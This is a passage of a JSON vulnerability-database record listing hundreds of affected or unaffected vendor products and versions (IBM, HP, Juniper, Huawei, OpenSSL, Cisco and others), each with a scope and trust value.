prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.2" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "laserjet printer series q3721a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9040/90508.260.3" }, { "model": "flex system fabric en4093 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.5" }, { "model": "manageone v100r002c10 spc320", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "svn2200 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "messagesight server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "secblade iii", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "safe profile", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.79" }, { "model": "junos 13.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "laserjet m5035 multifunction printer q7830a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "jetdirect 640n eio card j8025a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "45.35" }, { "model": "junos 13.2r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.2" }, { "model": "vdi-in-a-box", "scope": "ne", "trust": 0.3, "vendor": "citrix", "version": "5.4.4" }, { "model": "itbm standard", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "color laserjet cp3525 cc469a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos 13.1r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.11" }, { "model": "fortivoiceos build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "3.0.3165" }, { "model": "laserjet enterprise color m551 series cf082a 2302963 436083", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "500" }, { "model": "secure analytics", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.4" }, { "model": "eupp v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "security network intrusion prevention system gx6116", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.17" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "laserjet printer series q3722a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9040/90508.260.3" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "junos pulse 5.0r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.14" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.22" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "enterprise linux eus 5.9.z server", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.7.3" }, { "model": "laserjet p4515 cb516a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.3" }, { "model": "uma-db v2r1coospc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management hf6", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.2" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datafort management console", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "usg9300 usg9300 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.05" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "f1000e family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.113" }, { "model": "laserjet enterprise m601 series ce989a 2302963 436082", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "600" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "junos 11.4r6.6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.40" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "19200" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.3" }, { "model": "color laserjet cm4540 mfp cc419a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600-" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.3" }, { "model": "vsphere replication", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.6" }, { "model": "espace u2990 v200r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "msr93x russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "airwave", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "big data extensions", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.1" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "junos space 12.3r1.3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "dsr-1000n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "junos 11.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "svn5500 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "msr50 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.2.0.1055" }, { "model": "laserjet m5025 multifunction printer q7840a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)0" }, { "model": "tivoli netcool/system service monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idp 4.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "virtuozzo containers for linux", "scope": "eq", "trust": 0.3, "vendor": "parallels", "version": "4.7" }, { "model": "proxysgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.5" }, { "model": "junos 12.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "laserjet enterprise m603 series ce994a 2302963 436082", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "600" }, { "model": "vsphere support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.37" }, { "model": "airwave", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "7.2" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "laserjet enterprise m806 cz245a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "color laserjet printer series q7493a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "470046.230.6" }, { "model": "msr50 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.0" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.6.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.61" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.41" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "junos 10.0s28", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "isoc v200r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "color laserjet cp6015 q3931a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "color laserjet enterprise cp4525 cc493a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.0.4" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.4.2" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "utm", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "9.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.40" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.07" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1183.0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.7" }, { "model": "fortigate build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0589" }, { "model": "tivoli storage flashcopy manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.18" }, { "model": "junos os 12.3r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cms r17 r3", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8.1" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "websphere datapower b2b appliance xb62", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.10" }, { "model": "color laserjet cm6030 multifunction printer ce665a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52.256.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.16" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.79" }, { "model": "manageability sdk", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.13" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "security network intrusion prevention system gx5108", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "fortiwifi", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "vix api", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.12" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.16" }, { "model": "junos 5.0r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "fortiap", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.33" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.3" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.9" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "6.4" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "3.3" }, { "model": "web security gateway", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.1" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "vsphere replication", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.02" }, { "model": "clearpass", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "6.1.3" }, { "model": "uacos c5.0r4.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "laserjet enterprise p3015 ce525a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "junos 13.1r.3-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web filter", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.3" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.6" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.152" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.2" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "5.6" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.10" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3100v20" }, { "model": "laserjet p2055 printer series ce459a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "20141201" }, { "model": "color laserjet cm4730 multifunction printer cb483a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "proxysg sgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.3" }, { "model": "netscaler build", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "9.196.4" }, { "model": "real-time compression appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.203" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.3" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "logcenter v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "dynamic system analysis", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "dgs-1210-28", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "4.00.012" }, { "model": "ssl vpn 7.4r11.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.20" }, { "model": "laserjet enterprise m601 series ce989a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6000" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "network connect", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.3.0.13725" }, { "model": "infosphere master data management server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.152" }, { "model": "color laserjet printer series q7534a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "300046.80.2" }, { "model": "horizon workspace client for mac", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.8.1" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.51" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "netiq access manager", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "4.0" }, { "model": "flex system enterprise chassis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7893" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "watson explorer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.4" }, { "model": "s7700\u0026s9700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "netiq access manager", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "3.2" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "command view for tape libraries", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "sparc enterprise m8000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "oceanstor s2600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "laserjet enterprise color mfp m575dn cd645a 2302963 436081", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "500" }, { "model": "junos 12.1x45-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.4" }, { "model": "project openssl 1.0.1h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.1.2" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.4" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.0" }, { "model": "msr30-16 russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fortiwifi build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0589" }, { "model": "laserjet enterprise color m855 a2w77a 2302963 436076", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "800" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.4" }, { "model": "puredata system for hadoop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.01" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.3" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloudsystem chargeback", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.40" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.10" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.2354" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.3" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "7.0" }, { "model": "aura application server sip core pb3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "4.3.3" }, { "model": "netiq access gateway", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "0" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.2" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "security threat response manager 2012.1r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "laserjet m3027 multifunction printer cc479a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "sparc enterprise m3000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "color laserjet cp6015 q3932a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "53.236.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "2.0" }, { "model": "enterprise linux long life server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.6" }, { "model": "laserjet enterprise mfp m525f cf117a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5000" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.134.14" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.0" }, { "model": "ftp server", "scope": "ne", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.3" }, { "model": "junos 11.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "2.0.2" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "junos", "scope": 